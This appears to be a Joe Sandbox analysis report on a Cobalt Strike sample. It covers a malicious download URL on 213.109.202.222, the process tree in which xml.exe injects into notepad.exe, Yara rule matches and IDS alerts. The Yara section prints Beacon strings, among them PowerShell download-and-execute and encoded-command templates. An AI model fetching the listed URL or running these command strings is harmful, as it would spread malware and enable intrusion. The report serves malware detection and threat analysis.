Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://213.109.202.222/download/xml.xml

Overview

General Information

Sample URL:http://213.109.202.222/download/xml.xml
Analysis ID:1400842
Infos:

Detection

CobaltStrike
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected CobaltStrike
Allocates memory in foreign processes
Downloads suspicious files via Chrome
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Sigma detected: Notepad Making Network Connection
Writes to foreign memory regions
Creates a process in suspended mode (likely to inject code)
Drops PE files
May sleep (evasive loops) to hinder dynamic analysis
Potential browser exploit detected (process start blacklist hit)
Sigma detected: Use Short Name Path in Command Line
Stores files to the Windows start menu directory
Tries to load missing DLLs
Yara signature match

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 2824 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://213.109.202.222/download/xml.xml MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 1652 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 --field-trial-handle=1948,i,2797339336198320532,18040272526632211927,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • MSOXMLED.EXE (PID: 6676 cmdline: C:\Program Files (x86)\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE" /verb open "C:\Users\user\Downloads\xml.xml MD5: A2E6E2A1C125973A4967540FD08C9AF0)
      • iexplore.exe (PID: 6724 cmdline: "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\user\Downloads\xml.xml MD5: CFE2E6942AC1B72981B3105E22D3224E)
        • iexplore.exe (PID: 6860 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6724 CREDAT:17410 /prefetch:2 MD5: 6F0F06D6AB125A99E43335427066A4A1)
          • ie_to_edge_stub.exe (PID: 6952 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe" --from-ie-to-edge=3 --ie-frame-hwnd=202d4 MD5: 89CF8972D683795DAB6901BC9456675D)
            • msedge.exe (PID: 7012 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --from-ie-to-edge=3 --ie-frame-hwnd=202d4 MD5: 69222B8101B0601CC6663F8381E7E00F)
              • msedge.exe (PID: 6304 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2268 --field-trial-handle=1956,i,12291376917359172718,11941003201960649929,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
          • ssvagent.exe (PID: 6976 cmdline: "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new MD5: F9A898A606E7F5A1CD7CFFA8079253A0)
    • MSOXMLED.EXE (PID: 6700 cmdline: C:\Program Files (x86)\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE" /verb open "C:\Users\user\Downloads\xml.xml MD5: A2E6E2A1C125973A4967540FD08C9AF0)
      • iexplore.exe (PID: 6784 cmdline: "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\user\Downloads\xml.xml MD5: CFE2E6942AC1B72981B3105E22D3224E)
  • msedge.exe (PID: 3988 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --from-ie-to-edge=3 --ie-frame-hwnd=202d4 --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 6740 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=1952,i,13579703715836631076,8687465127834077069,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7592 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6304 --field-trial-handle=1952,i,13579703715836631076,8687465127834077069,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7632 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6596 --field-trial-handle=1952,i,13579703715836631076,8687465127834077069,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 6884 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6928 --field-trial-handle=1952,i,13579703715836631076,8687465127834077069,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
      • cookie_exporter.exe (PID: 4076 cmdline: cookie_exporter.exe --cookie-json=1148 MD5: 3DD7152D6D33725EA5958D7DE2586B97)
    • msedge.exe (PID: 9016 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-GB --service-sandbox-type=collections --mojo-platform-channel-handle=7884 --field-trial-handle=1952,i,13579703715836631076,8687465127834077069,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7352 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-GB --service-sandbox-type=icon_reader --mojo-platform-channel-handle=8184 --field-trial-handle=1952,i,13579703715836631076,8687465127834077069,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • xml.exe (PID: 7644 cmdline: "C:\Users\user\Downloads\xml.exe" MD5: 91807225181F95317A20DF820AF456BF)
      • conhost.exe (PID: 9092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • notepad.exe (PID: 1132 cmdline: C:\Windows\System32\notepad.exe MD5: 27F71B12CB585541885A31BE22F61C83)
    • msedge.exe (PID: 5160 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6776 --field-trial-handle=1952,i,13579703715836631076,8687465127834077069,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • rundll32.exe (PID: 8080 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • MSOXMLED.EXE (PID: 8164 cmdline: C:\Program Files (x86)\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE" /verb open "C:\Users\user\Downloads\xml.xml MD5: A2E6E2A1C125973A4967540FD08C9AF0)
    • iexplore.exe (PID: 8004 cmdline: "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\user\Downloads\xml.xml MD5: CFE2E6942AC1B72981B3105E22D3224E)
      • iexplore.exe (PID: 8804 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:8004 CREDAT:9474 /prefetch:2 MD5: 6F0F06D6AB125A99E43335427066A4A1)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Cobalt Strike, CobaltStrikeCobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike
SourceRuleDescriptionAuthorStrings
00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrikeYara detected CobaltStrikeJoe Security
    00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
      00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_CobaltStrike_ee756db7Attempts to detect Cobalt Strike based on strings found in BEACONunknown
      • 0x329a3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
      • 0x32a1b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
      • 0x33180:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset.
      • 0x334b2:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s
      • 0x33444:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
      • 0x334b2:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
      • 0x32a7e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
      • 0x32c0f:$a7: could not run command (w/ token) because of its length of %d bytes!
      • 0x32ac4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s
      • 0x32b02:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s
      • 0x334fc:$a10: powershell -nop -exec bypass -EncodedCommand "%s"
      • 0x32d6a:$a11: Could not open service control manager on %s: %d
      • 0x3329c:$a12: %d is an x64 process (can't inject x86 content)
      • 0x332cc:$a13: %d is an x86 process (can't inject x64 content)
      • 0x335ed:$a14: Failed to impersonate logged on user %d (%u)
      • 0x33255:$a15: could not create remote thread in %d: %d
      • 0x32b38:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
      • 0x33203:$a17: could not write to process memory: %d
      • 0x32d9b:$a18: Could not create service %s on %s: %d
      • 0x32e24:$a19: Could not delete service %s on %s: %d
      • 0x32c89:$a20: Could not open process token: %d (%u)
      00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_CobaltStrike_663fc95dIdentifies CobaltStrike via unidentified function codeunknown
      • 0x1d93c:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
      00000027.00000002.2270015758.0000024D021E0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_CobaltStrike_f0b627fcRule for beacon reflective loaderunknown
      • 0x1956a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
      • 0x1a89b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
      Click to see the 20 entries

      System Summary

      barindex
      Source: Network ConnectionAuthor: EagleEye Team: Data: DestinationIp: 213.109.202.222, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\notepad.exe, Initiated: true, ProcessId: 1132, Protocol: tcp, SourceIp: 192.168.2.17, SourceIsIpv6: false, SourcePort: 49837
      Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new, CommandLine: "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new, CommandLine|base64offset|contains: w, Image: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe, NewProcessName: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe, OriginalFileName: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe, ParentCommandLine: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6724 CREDAT:17410 /prefetch:2, ParentImage: C:\Program Files (x86)\Internet Explorer\iexplore.exe, ParentProcessId: 6860, ParentProcessName: iexplore.exe, ProcessCommandLine: "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new, ProcessId: 6976, ProcessName: ssvagent.exe
      Source: Registry Key setAuthor: frack113: Data: Details: 1, EventID: 13, EventType: SetValue, Image: C:\Program Files\Internet Explorer\iexplore.exe, ProcessId: 6724, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SecuritySafe
      Timestamp:02/29/24-11:58:33.307084
      SID:2033713
      Source Port:49879
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:30.732534
      SID:2033713
      Source Port:49873
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:44.177958
      SID:2033713
      Source Port:49907
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:34.339188
      SID:2033713
      Source Port:49882
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:36.428537
      SID:2033713
      Source Port:49888
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:42.643899
      SID:2033713
      Source Port:49901
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:59:09.133704
      SID:2033713
      Source Port:49959
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:59:13.823969
      SID:2033713
      Source Port:49968
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:59:17.491024
      SID:2033713
      Source Port:49977
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:45.774544
      SID:2033713
      Source Port:49910
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:56.680872
      SID:2033713
      Source Port:49934
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:40.570896
      SID:2033713
      Source Port:49897
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:18.834966
      SID:2033713
      Source Port:49845
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:38.474165
      SID:2033713
      Source Port:49892
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:52.006691
      SID:2033713
      Source Port:49925
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:52.520322
      SID:2033713
      Source Port:49926
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:49.961162
      SID:2033713
      Source Port:49920
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:36.940682
      SID:2033713
      Source Port:49889
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:15.252376
      SID:2033713
      Source Port:49837
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:22.938294
      SID:2033713
      Source Port:49854
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:59:10.170690
      SID:2033713
      Source Port:49961
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:59:13.312979
      SID:2033713
      Source Port:49967
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:59:03.913535
      SID:2033713
      Source Port:49949
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:30.211390
      SID:2033713
      Source Port:49872
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:44.704300
      SID:2033713
      Source Port:49908
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:48.395611
      SID:2033713
      Source Port:49915
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:59:01.300035
      SID:2033713
      Source Port:49944
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:32.789446
      SID:2033713
      Source Port:49878
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:37.961908
      SID:2033713
      Source Port:49891
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:59:10.696230
      SID:2033713
      Source Port:49962
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:23.450534
      SID:2033713
      Source Port:49855
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:59:00.788294
      SID:2033713
      Source Port:49942
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:19.872901
      SID:2033713
      Source Port:49847
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:59:01.818068
      SID:2033713
      Source Port:49945
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:59.255111
      SID:2033713
      Source Port:49939
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:57.704450
      SID:2033713
      Source Port:49936
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:26.550223
      SID:2033713
      Source Port:49862
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:22.428397
      SID:2033713
      Source Port:49853
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:59:04.967332
      SID:2033713
      Source Port:49951
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:59:14.350644
      SID:2033713
      Source Port:49969
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:59:16.451462
      SID:2033713
      Source Port:49975
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:32.265880
      SID:2033713
      Source Port:49877
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:59:14.873905
      SID:2033713
      Source Port:49972
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:59:12.787062
      SID:2033713
      Source Port:49966
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:59:08.620213
      SID:2033713
      Source Port:49958
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:28.656160
      SID:2033713
      Source Port:49869
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:35.378350
      SID:2033713
      Source Port:49886
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:31.242631
      SID:2033713
      Source Port:49875
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:16.789257
      SID:2033713
      Source Port:49840
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:59:11.733860
      SID:2033713
      Source Port:49964
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:04.278105
      SID:2019714
      Source Port:49825
      Destination Port:80
      Protocol:TCP
      Classtype:Potentially Bad Traffic
      Timestamp:02/29/24-11:58:50.984191
      SID:2033713
      Source Port:49923
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:59:02.869302
      SID:2033713
      Source Port:49947
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:24.488815
      SID:2033713
      Source Port:49858
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:41.612793
      SID:2033713
      Source Port:49899
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:43.667960
      SID:2033713
      Source Port:49906
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:59:06.003067
      SID:2033713
      Source Port:49953
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:46.847678
      SID:2033713
      Source Port:49912
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:31.752824
      SID:2033713
      Source Port:49876
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:29.167927
      SID:2033713
      Source Port:49870
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:59:15.925350
      SID:2033713
      Source Port:49974
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:59:12.272407
      SID:2033713
      Source Port:49965
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:47.373290
      SID:2033713
      Source Port:49913
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:39.522209
      SID:2033713
      Source Port:49894
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:55.112350
      SID:2033713
      Source Port:49931
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:53.556258
      SID:2033713
      Source Port:49928
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:58.217755
      SID:2033713
      Source Port:49937
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:16.277694
      SID:2033713
      Source Port:49839
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:59.764498
      SID:2033713
      Source Port:49940
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:21.917474
      SID:2033713
      Source Port:49851
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:49.434125
      SID:2033713
      Source Port:49919
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:17.300087
      SID:2033713
      Source Port:49842
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:59:07.041030
      SID:2033713
      Source Port:49955
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:25.511968
      SID:2033713
      Source Port:49860
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:33.826887
      SID:2033713
      Source Port:49880
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:40.045890
      SID:2033713
      Source Port:49895
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:45.230335
      SID:2033713
      Source Port:49909
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:47.883252
      SID:2033713
      Source Port:49914
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:17.812839
      SID:2033713
      Source Port:49843
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:20.382830
      SID:2033713
      Source Port:49848
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:55.625976
      SID:2033713
      Source Port:49932
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:34.851448
      SID:2033713
      Source Port:49884
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:59:15.400199
      SID:2033713
      Source Port:49973
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:59:07.566489
      SID:2033713
      Source Port:49956
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:59:04.439371
      SID:2033713
      Source Port:49950
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:26.040665
      SID:2033713
      Source Port:49861
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:20.894180
      SID:2033713
      Source Port:49849
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:50.471544
      SID:2033713
      Source Port:49921
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:58.743861
      SID:2033713
      Source Port:49938
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:18.324235
      SID:2033713
      Source Port:49844
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:59:03.394343
      SID:2033713
      Source Port:49948
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:56.153729
      SID:2033713
      Source Port:49933
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:21.406933
      SID:2033713
      Source Port:49850
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:37.450653
      SID:2033713
      Source Port:49890
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:53.047327
      SID:2033713
      Source Port:49927
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:15.768907
      SID:2033713
      Source Port:49838
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:59:09.644062
      SID:2033713
      Source Port:49960
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:59:11.207160
      SID:2033713
      Source Port:49963
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:43.154248
      SID:2033713
      Source Port:49902
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:29.693177
      SID:2033713
      Source Port:49871
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:27.603807
      SID:2033713
      Source Port:49865
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:59:06.516202
      SID:2033713
      Source Port:49954
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:02/29/24-11:58:25.000717
      SID:2033713
      Source Port:49859
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
